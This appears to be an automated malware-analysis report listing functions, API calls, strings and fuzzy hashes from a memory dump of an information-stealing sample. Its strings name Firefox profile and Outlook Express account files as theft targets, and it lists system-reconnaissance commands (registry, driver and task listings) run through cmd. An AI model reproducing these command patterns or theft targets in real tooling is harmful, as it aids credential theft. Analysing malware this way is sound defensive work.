Instruction Fuzzy Hash: EE312771900209EBCB20DF95DC89CEEBFF9EB94B51B608095F406E6150EB709A84CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B2BAE9, Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,00000102,?,?,?,00000000,00000000), ref: 00B2BB28
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00B2BB39
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000), ref: 00B2BB54
GetLastError.KERNEL32 ref: 00B2BB6A
HeapFree.KERNEL32(00000000,?), ref: 00B2BB7C
HeapFree.KERNEL32(00000000,?), ref: 00B2BB91

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
String ID:
API String ID: 1822509305-0
Opcode ID: 44c737711ccec14c81cca24df5ac8914fb1d80a254854c8439f9b0eea4cf132b
Instruction ID: 83af143437571a490714cdee55826791404d2c3738856d185f290aedf7b20502
Opcode Fuzzy Hash: 44c737711ccec14c81cca24df5ac8914fb1d80a254854c8439f9b0eea4cf132b
Instruction Fuzzy Hash: CD110A76901128BBDF225B95EC48CEF7FBEEF493A0B204461F509E2160CF314A51EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B2B291, Relevance: 9.1, APIs: 6, Instructions: 67stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000E39,00000000,?), ref: 00B2B2B9
_strupr.NTDLL ref: 00B2B2F4
lstrlen.KERNEL32(00000000), ref: 00B2B2FC
TerminateProcess.KERNEL32(00000000,00000000), ref: 00B2B33C
CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 00B2B343
GetLastError.KERNEL32 ref: 00B2B34B

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
String ID:
API String ID: 110452925-0
Opcode ID: 77505a89fa78cc35bb79af97f8a5ec2b3fcae21a626d46d99d07ac1a0de98fec
Instruction ID: 2c27c398786128f173c863722d548f824aaaa7528ac4e0d91bdf318fc5eb7604
Opcode Fuzzy Hash: 77505a89fa78cc35bb79af97f8a5ec2b3fcae21a626d46d99d07ac1a0de98fec
Instruction Fuzzy Hash: A3119176100215AFDB15AB70ACC8DAE37BDFB88750B244456FA4AD31A0DF74DD88CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B195DC, Relevance: 9.1, APIs: 6, Instructions: 64libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00B3247D: RtlAllocateHeap.NTDLL(00000000,00000200,00B26D11), ref: 00B32489

LoadLibraryA.KERNEL32(6676736D,00000000,00000001,00000014,00000020,00B34804,00000000,00000001), ref: 00B195FC
GetProcAddress.KERNEL32(00000000,704F4349), ref: 00B1961B
GetProcAddress.KERNEL32(00000000,6C434349), ref: 00B19630
GetProcAddress.KERNEL32(00000000,6E494349), ref: 00B19646
GetProcAddress.KERNEL32(00000000,65474349), ref: 00B1965C
GetProcAddress.KERNEL32(00000000,65534349), ref: 00B19672

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: AddressProc$AllocateHeapLibraryLoad
String ID:
API String ID: 2486251641-0
Opcode ID: 50c094314342d6f9a851ac35e570d968287bf703c0dc516bdd44d7574cadf235
Instruction ID: 10beece14c656aac6fcbf7ec000857243165fbcdd73b932714c6fd6f53c5d4ee
Opcode Fuzzy Hash: 50c094314342d6f9a851ac35e570d968287bf703c0dc516bdd44d7574cadf235
Instruction Fuzzy Hash: 711158B25007065FD714EB78DCC0DAB33ECEB4478431605B6EA1ACB165DB70E9498B70

Uniqueness

Uniqueness Score: -1.00%

Function 00B19E9F, Relevance: 9.1, APIs: 6, Instructions: 64memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000001,00000000,00000000,?,?,00B148BE,00B31A07,00000057,00000000,?,?,?,00B16516,00000000,Scr), ref: 00B19EB5
RtlAllocateHeap.NTDLL(00000000,00000009,00000001), ref: 00B19EC8
lstrcpy.KERNEL32(00000008,?), ref: 00B19EEA
GetLastError.KERNEL32(00B2328C,00000000,00000000,?,?,00B148BE,00B31A07,00000057,00000000,?,?,?,00B16516,00000000,Scr,?), ref: 00B19F13
HeapFree.KERNEL32(00000000,00000000,?,?,00B148BE,00B31A07,00000057,00000000,?,?,?,00B16516,00000000,Scr,?,?), ref: 00B19F2B
CloseHandle.KERNEL32(00000000,00B2328C,00000000,00000000,?,?,00B148BE,00B31A07,00000057,00000000,?,?,?,00B16516,00000000,Scr), ref: 00B19F34

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
String ID:
API String ID: 2860611006-0
Opcode ID: b6b08d27ddefa342bac27a0c25308b9769363a9d5aa167e07828c776ebbfd7c8
Instruction ID: 0a40f8af605990dd6798dab1cd7f4b519cb6014da28a8e619ec6f6bd4afc0f4a
Opcode Fuzzy Hash: b6b08d27ddefa342bac27a0c25308b9769363a9d5aa167e07828c776ebbfd7c8
Instruction Fuzzy Hash: 27115E72501349EFDB149F64DCC89AEBBE8FB05360760456AF85AC3250DF709E45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B28800, Relevance: 9.1, APIs: 6, Instructions: 61stringthreadtimeCOMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,00B2BE68,00000000,?,00000000,00000000,?), ref: 00B28812

Part of subcall function 00B3247D: RtlAllocateHeap.NTDLL(00000000,00000200,00B26D11), ref: 00B32489

GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,00B2BE68,00000000,?,00000000,00000000,?), ref: 00B2882B
GetCurrentThreadId.KERNEL32 ref: 00B28838
GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00B2BE68,00000000,?,00000000,00000000,?), ref: 00B28844
GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00B2BE68,00000000,?,00000000,00000000,?), ref: 00B28852
lstrcpy.KERNEL32(00000000), ref: 00B28874

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
String ID:
API String ID: 1175089793-0
Opcode ID: ab5754c86e84639fc7518a5ae43235c24d44a2c044cf403ddd1e5ceefee6e490
Instruction ID: 959f9bb71f360848fd28b44e4bdf60b90154958f3a4cd382ad188ae51c6290b2
Opcode Fuzzy Hash: ab5754c86e84639fc7518a5ae43235c24d44a2c044cf403ddd1e5ceefee6e490
Instruction Fuzzy Hash: 4E01C073901224ABE7155BA5BC88E6F7BFCDF85B4071900A6BA09DB110DF74EC088BB1

Uniqueness

Uniqueness Score: -1.00%

Function 00B29299, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00B292F4
SetLastError.KERNEL32(00000000,?,?,?), ref: 00B29348

Strings

vids, xrefs: 00B29353

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: ErrorLastmemset
String ID: vids
API String ID: 3276359510-3767230166
Opcode ID: d4366081be7308ef9aac3d942a1825f5cc3d85551d12bb9d7776f35946d4e4c4
Instruction ID: b1ef7c21bc7a464231f94148ff8aafadd76a5a86bb53bd398d5e658abb2a4a62
Opcode Fuzzy Hash: d4366081be7308ef9aac3d942a1825f5cc3d85551d12bb9d7776f35946d4e4c4
Instruction Fuzzy Hash: 478118B1D102299FCF21DFA4E9819EDBBF9EF48710F10819AF819A7251D6709A45CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00B25EC0, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 110COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00B25F6B
FlushFileBuffers.KERNEL32(00000000,?,00000000,00000000), ref: 00B25FD2
GetLastError.KERNEL32(?,00000000,00000000), ref: 00B25FDC

Strings

K, xrefs: 00B25F93
P, xrefs: 00B25F8F

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: BuffersErrorFileFlushLastmemset
String ID: K$P
API String ID: 3817869962-420285281
Opcode ID: 2420bc5906029ee5cb296c2e2bbfb9c7139229f828055a4c1be75cd95ae63acd
Instruction ID: 2ccfe7a61698b904fb3310640745a0620b98975c2e893e564e5521ba77c89eb0
Opcode Fuzzy Hash: 2420bc5906029ee5cb296c2e2bbfb9c7139229f828055a4c1be75cd95ae63acd
Instruction Fuzzy Hash: AA416D31A00B159FDB348FA8DE8466ABBF1FF18714F14496DE88A93A81D734E944CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00B25745, Relevance: 8.9, APIs: 7, Instructions: 106stringCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,00B209E2,00000000,?,?,?,00B209E2,?,?,?,?,?), ref: 00B25783
lstrlen.KERNEL32(00B209E2,?,?,?,00B209E2,?,?,?,?,?), ref: 00B25795
memcpy.NTDLL(?,?,?,?,?,?,?), ref: 00B25809
lstrlen.KERNEL32(00B209E2,00000000,00000000,?,?,?,00B209E2,?,?,?,?,?), ref: 00B2581E
lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 00B25837
memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 00B25840
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00B2584E

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: lstrlenmemcpy$FreeLocal
String ID:
API String ID: 1123625124-0
Opcode ID: 2bde2168d16bd915e8b4ead6dabb99e5711b9dc6804d2a8088902a20cd93a7ec
Instruction ID: 4d4f6efd5c530db7b218c159771dfd9290691f6f2fd74bdac1669aaa59840760
Opcode Fuzzy Hash: 2bde2168d16bd915e8b4ead6dabb99e5711b9dc6804d2a8088902a20cd93a7ec
Instruction Fuzzy Hash: B331FD7280022AAFDF119F65EC458DF3FA8EF143A0F154465FC1896221E771DE609BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00B1C790, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B22891: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000100,?,?,?), ref: 00B2289F

RtlAllocateHeap.NTDLL(00000000,?), ref: 00B1C7F1
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00B1C840

Part of subcall function 00B24241: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,00B21ED8), ref: 00B24282
Part of subcall function 00B24241: GetLastError.KERNEL32 ref: 00B2428C
Part of subcall function 00B24241: WaitForSingleObject.KERNEL32(000000C8), ref: 00B242B1
Part of subcall function 00B24241: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 00B242D2
Part of subcall function 00B24241: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 00B242FA
Part of subcall function 00B24241: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 00B2430F
Part of subcall function 00B24241: SetEndOfFile.KERNEL32(00000006), ref: 00B2431C
Part of subcall function 00B24241: CloseHandle.KERNEL32(00000006), ref: 00B24334

HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,?,?,00B2314E,?,?,?,?,?,?), ref: 00B1C875
HeapFree.KERNEL32(00000000,?,?,?,?,00B2314E,?,?,?,?,?,?,00000000,?,00000000), ref: 00B1C885

Strings

https://, xrefs: 00B1C7A2

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
String ID: https://
API String ID: 4200334623-4275131719
Opcode ID: 9de26f2f30261ae8b1e8f3f11837eb7dbcb2c40a1fde137f8e04bab0c386917a
Instruction ID: c57e33f2981ad0d6de6b6e763b21b6c79fae82d1a9cc217554569a463d003bbc
Opcode Fuzzy Hash: 9de26f2f30261ae8b1e8f3f11837eb7dbcb2c40a1fde137f8e04bab0c386917a
Instruction Fuzzy Hash: 4631F7B5910119FFEB149BA4DD89CBEBBAEFB08340B2000A5F505E3160DB71AE51DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B32639, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B2F750: memcpy.NTDLL(00000000,00000090,?,?,00000000,00000000), ref: 00B2F78C
Part of subcall function 00B2F750: memset.NTDLL ref: 00B2F808
Part of subcall function 00B2F750: memset.NTDLL ref: 00B2F81D

RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 00B3268D
lstrcmpi.KERNEL32(00000000,Main), ref: 00B326AD
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00B326F2
HeapFree.KERNEL32(00000000,?,?,00000000,?,?,00000000,00000000), ref: 00B32703

Strings

Main, xrefs: 00B326A5

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heap$Freememset$Allocatelstrcmpimemcpy
String ID: Main
API String ID: 1065503980-521822810
Opcode ID: 182ca4ea655d8565626688474e3f355590ce302bcbdfb660860bbc6fb26c5d03
Instruction ID: ea3b1ccd9d92c8407617bb8159a13169b73422c563f39e37e9bf2eea7d9798f6
Opcode Fuzzy Hash: 182ca4ea655d8565626688474e3f355590ce302bcbdfb660860bbc6fb26c5d03
Instruction Fuzzy Hash: 53214A35A00209FFDF11AFA4EC85AAE7BB9FF04344F2044A4F905E7161DB70AE559B60

Uniqueness

Uniqueness Score: -1.00%

Function 00B2E9BE, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 79libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(NTDLL.DLL,?,?,00000001), ref: 00B2E9CF
LoadLibraryA.KERNEL32(NTDSAPI.DLL,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00B2EA69
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00B2EA74

Strings

NTDSAPI.DLL, xrefs: 00B2EA62
NTDLL.DLL, xrefs: 00B2E9CA

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Library$FreeHandleLoadModule
String ID: NTDLL.DLL$NTDSAPI.DLL
API String ID: 2140536961-3558519346
Opcode ID: a2503a8393a8bd8934ad68341f17d33bdbef8dee429fad28f09fc7dfade69c50
Instruction ID: 024d036a233aabbf3bce222314232f831da1b761fc65ac57b8720254dcf9533e
Opcode Fuzzy Hash: a2503a8393a8bd8934ad68341f17d33bdbef8dee429fad28f09fc7dfade69c50
Instruction Fuzzy Hash: FB318F715043228FDB14CF16E484A6ABBE0FF84315F1449AEF89DC7251E770D949CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00B1F4CD, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,?,?,?,?,?,00B16709,?,?,?,Salt,?,?,?,Store Root,?), ref: 00B1F4E1

Part of subcall function 00B3247D: RtlAllocateHeap.NTDLL(00000000,00000200,00B26D11), ref: 00B32489

mbstowcs.NTDLL ref: 00B1F4FD
lstrlen.KERNEL32(account{*}.oeaccount), ref: 00B1F50B
mbstowcs.NTDLL ref: 00B1F523

Part of subcall function 00B2888D: lstrlenW.KERNEL32(?,00000000,%APPDATA%\Mozilla\Firefox\Profiles,?,00000250,?,00000000), ref: 00B288D9
Part of subcall function 00B2888D: lstrlenW.KERNEL32(?,?,00000000), ref: 00B288E5
Part of subcall function 00B2888D: memset.NTDLL ref: 00B2892D
Part of subcall function 00B2888D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00B28948
Part of subcall function 00B2888D: lstrlenW.KERNEL32(0000002C), ref: 00B28980
Part of subcall function 00B2888D: lstrlenW.KERNEL32(?), ref: 00B28988
Part of subcall function 00B2888D: memset.NTDLL ref: 00B289AB
Part of subcall function 00B2888D: wcscpy.NTDLL ref: 00B289BD

Part of subcall function 00B24FB0: RtlFreeHeap.NTDLL(00000000,00000200,00B26EB2,00000000,00000100,00000200), ref: 00B24FBC

Strings

account{*}.oeaccount, xrefs: 00B1F505, 00B1F50A, 00B1F521

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$Heapmbstowcsmemset$AllocateFileFindFirstFreewcscpy
String ID: account{*}.oeaccount
API String ID: 1961997177-4234512180
Opcode ID: c8ef5e88499930c53997ebabebe12512be69b3873d263b32eb5640bc9743563c
Instruction ID: 3a9ff75cb905e88ffaef986450abafcf878fc348ba393690afff5b0c12e97ad5
Opcode Fuzzy Hash: c8ef5e88499930c53997ebabebe12512be69b3873d263b32eb5640bc9743563c
Instruction Fuzzy Hash: 0201B972D10214BBCB106BA5DC86FDF7EECEF85750F1440A5B609A3111EB75DA44D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00B24406, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 00B24422
lstrlen.KERNEL32(EMPTY,00000008,00000000,0000010E,00000000,00000000,?,00000000,64F16420,?,00B1B1B4,?,?,00000000,?,?), ref: 00B24456
HeapFree.KERNEL32(00000000,00000000,EMPTY,00000000,?,00000000,64F16420,?,00B1B1B4,?,?,00000000,?,?,00000001,00000000), ref: 00B24472

Strings

log, xrefs: 00B2445E
EMPTY, xrefs: 00B24450, 00B24455, 00B2445D

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreelstrlen
String ID: EMPTY$log
API String ID: 3886119090-141014656
Opcode ID: 75f831c670969f24fcf18199b5552de9266c4158105af79d891d1e7a2bed82b8
Instruction ID: bea00aeb47365f9f9ceb9e295d4effdb3ab9817ce385b6998af988e9991626bb
Opcode Fuzzy Hash: 75f831c670969f24fcf18199b5552de9266c4158105af79d891d1e7a2bed82b8
Instruction Fuzzy Hash: 4801A472A00228BBDB2167A9AC88EEF7BEDDB857A0B3004A2F105D3610DEB14D40D671

Uniqueness

Uniqueness Score: -1.00%

Function 00B3427B, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00B3E220,00B1C8D3,?,00000000), ref: 00B3427F
GetModuleHandleA.KERNEL32(NTDLL.DLL,LdrRegisterDllNotification,?,00000000), ref: 00B34293
GetProcAddress.KERNEL32(00000000), ref: 00B3429A

Strings

LdrRegisterDllNotification, xrefs: 00B34289
NTDLL.DLL, xrefs: 00B3428E

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: AddressHandleModuleProcVersion
String ID: LdrRegisterDllNotification$NTDLL.DLL
API String ID: 3310240892-3368964806
Opcode ID: d5d28f5e48522c3eea7c1b0133a28edea41f049d05d072b6be0310297a532ed1
Instruction ID: b0f9f09404785854cd7b3d976169a92d90af5bed207da7a9a448b7dbf934a178
Opcode Fuzzy Hash: d5d28f5e48522c3eea7c1b0133a28edea41f049d05d072b6be0310297a532ed1
Instruction Fuzzy Hash: CB019EB06503019FD7509F799C89B16BAE8EB09300F30C1FAF649EB2A0DB70E841CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00B18A10, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48memorystringCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(00B3DF60,00000000), ref: 00B18A20
RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 00B18A3A
lstrcpy.KERNEL32(00000000,-01), ref: 00B18A5A
HeapFree.KERNEL32(00000000,00000000,00B3DF60,?,00000000,00000000,00000000,?,00000000,00B30F94,00000000,00000000), ref: 00B18A7D

Part of subcall function 00B359F7: SetEvent.KERNEL32(?,00B18A31,?,00000000,00B30F94,00000000,00000000), ref: 00B35A0B
Part of subcall function 00B359F7: WaitForSingleObject.KERNEL32(?,000000FF,0000003C,?,00000000,00B30F94,00000000,00000000), ref: 00B35A25
Part of subcall function 00B359F7: CloseHandle.KERNEL32(?,?,00000000,00B30F94,00000000,00000000), ref: 00B35A2E
Part of subcall function 00B359F7: CloseHandle.KERNEL32(?,0000003C,?,00000000,00B30F94,00000000,00000000), ref: 00B35A3C
Part of subcall function 00B359F7: RtlEnterCriticalSection.NTDLL(00000008), ref: 00B35A48
Part of subcall function 00B359F7: RtlLeaveCriticalSection.NTDLL(00000008), ref: 00B35A71
Part of subcall function 00B359F7: CloseHandle.KERNEL32(?), ref: 00B35A8D
Part of subcall function 00B359F7: LocalFree.KERNEL32(?), ref: 00B35A9B
Part of subcall function 00B359F7: RtlDeleteCriticalSection.NTDLL(00000008), ref: 00B35AA5

Strings

-01, xrefs: 00B18A52

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
String ID: -01
API String ID: 1103286547-1095514728
Opcode ID: 207d39f435d945df5d25ad918aca3f3ba33dc7f7488b0a04c1eb9d7e42f9634b
Instruction ID: 9b9ddeadad30417ac38d1d2f2698605e1be3827cf874967ae25218d74d08a615
Opcode Fuzzy Hash: 207d39f435d945df5d25ad918aca3f3ba33dc7f7488b0a04c1eb9d7e42f9634b
Instruction Fuzzy Hash: 7EF0C2B3644218BFD6202BA1BCCCDBF7BADEB497A6B2001A1F60593120CE218C448671

Uniqueness

Uniqueness Score: -1.00%

Function 00B263E9, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45libraryloaderCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(?,00000000,73BCF720,?,00B1A894,00000000,?,?,?,00B325B8), ref: 00B2640D
GetModuleHandleA.KERNEL32(NTDLL.DLL,LdrUnregisterDllNotification,?,00B1A894,00000000,?,?,?,00B325B8), ref: 00B26421
GetProcAddress.KERNEL32(00000000), ref: 00B26428

Strings

NTDLL.DLL, xrefs: 00B2641C
LdrUnregisterDllNotification, xrefs: 00B26417

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: AddressHandleModuleProcVersion
String ID: LdrUnregisterDllNotification$NTDLL.DLL
API String ID: 3310240892-3940208311
Opcode ID: 70078c4d6a3cc337bfc37336c4714a0b91b0d9aa342cec0274a4b05ffcc38bce
Instruction ID: f3a95c99231b7aa143f3e6652d27cde740a7c55e0411fa813853698fcf17e0ba
Opcode Fuzzy Hash: 70078c4d6a3cc337bfc37336c4714a0b91b0d9aa342cec0274a4b05ffcc38bce
Instruction Fuzzy Hash: 4C0162751002109FC710AF68FC88A2AB7E9FB9930472584AAF56D97365CB71FC41CA55

Uniqueness

Uniqueness Score: -1.00%

Function 00B14B29, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00B1F1E8,reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >,00000000,?,driverquery.exe >,00000000,?,tasklist.exe /SVC >,00000000,?,nslookup 127.0.0.1 >,00000000), ref: 00B14B2E
RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 00B14B43
wsprintfA.USER32 ref: 00B14B58

Part of subcall function 00B1B598: memset.NTDLL ref: 00B1B5AD
Part of subcall function 00B1B598: lstrlenW.KERNEL32(00000000,00000000,00000000,7711DBB0,00000000,cmd /C "%s> %s1"), ref: 00B1B5E6
Part of subcall function 00B1B598: wcstombs.NTDLL ref: 00B1B5F0
Part of subcall function 00B1B598: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,7711DBB0,00000000,cmd /C "%s> %s1"), ref: 00B1B621
Part of subcall function 00B1B598: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00B2793E), ref: 00B1B64D
Part of subcall function 00B1B598: TerminateProcess.KERNEL32(?,000003E5), ref: 00B1B663
Part of subcall function 00B1B598: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00B2793E), ref: 00B1B677
Part of subcall function 00B1B598: CloseHandle.KERNEL32(?), ref: 00B1B6AA
Part of subcall function 00B1B598: CloseHandle.KERNEL32(?), ref: 00B1B6AF

HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 00B14B74

Strings

cmd /U /C "type %s1 > %s & del %s1", xrefs: 00B14B52

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
String ID: cmd /U /C "type %s1 > %s & del %s1"
API String ID: 1624158581-4158521270
Opcode ID: c41b31f806600965ad64dde63d37b4c263dda7e927c06a5901210726394e1a4b
Instruction ID: e7ae81fb67af5b2c7e56da9dfac1f1548a5b9ec5ab7533f2285a44acc75e05db
Opcode Fuzzy Hash: c41b31f806600965ad64dde63d37b4c263dda7e927c06a5901210726394e1a4b
Instruction Fuzzy Hash: 23F0A031605210BBC6211729BC0DF5F7EADDFC2B21F340160F905E72E0CF20C84685A5

Uniqueness

Uniqueness Score: -1.00%

Function 00B2447F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,.dll,?,00000000,00B1A218,?,.dll,?,00001000,?,?,?), ref: 00B2448D
lstrlen.KERNEL32(DllRegisterServer), ref: 00B2449B
RtlAllocateHeap.NTDLL(00000000,00000022), ref: 00B244B0

Strings

.dll, xrefs: 00B2448B
DllRegisterServer, xrefs: 00B24493, 00B24498, 00B244C1

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$AllocateHeap
String ID: .dll$DllRegisterServer
API String ID: 3070124600-294589026
Opcode ID: 47063753f5af783c681722b13a8a6a32d4c5ebe4b0a7cff426c4938dbd6784ff
Instruction ID: e5e6240bef5838a936a57790b359e16adc5a8e482918987ca92bbb5417155a6b
Opcode Fuzzy Hash: 47063753f5af783c681722b13a8a6a32d4c5ebe4b0a7cff426c4938dbd6784ff
Instruction Fuzzy Hash: 8BF08273901220ABD3205BA8ECC8E9BBBECEB487517150166FA0AD3221DE30DD1587A5

Uniqueness

Uniqueness Score: -1.00%

Function 00B1F675, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28sleepmemoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(05778D20), ref: 00B1F67E
Sleep.KERNEL32(0000000A,?,?,00B358C6,?,?,?,?,?,00B120D2,?), ref: 00B1F688
HeapFree.KERNEL32(00000000,?,?,?,00B358C6,?,?,?,?,?,00B120D2,?), ref: 00B1F6B6
RtlLeaveCriticalSection.NTDLL(05778D20), ref: 00B1F6CB

Strings

0123456789ABCDEF, xrefs: 00B1F6A5

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: 0123456789ABCDEF
API String ID: 58946197-2554083253
Opcode ID: f36425563531b5828cea16dc6bbfe1a04584ede25cfff752c7697532d9d4bf7a
Instruction ID: 2b31e2e9c56efc50861ec37d04eead37486b52106a8813bb89ab592d6881b015
Opcode Fuzzy Hash: f36425563531b5828cea16dc6bbfe1a04584ede25cfff752c7697532d9d4bf7a
Instruction Fuzzy Hash: 9CF0F874200601DFEB088F28EE89B6E37E5EB54300B24406AF602D73B0CF30ED44DA26

Uniqueness

Uniqueness Score: -1.00%

Function 00B1D570, Relevance: 7.6, APIs: 6, Instructions: 137stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B20DCC: ExpandEnvironmentStringsW.KERNEL32(770F4620,00000000,00000000,00000000,770F4620,00000000,00B15FE6,%userprofile%\AppData\Local\,?,00000000,00B123FE), ref: 00B20DDD
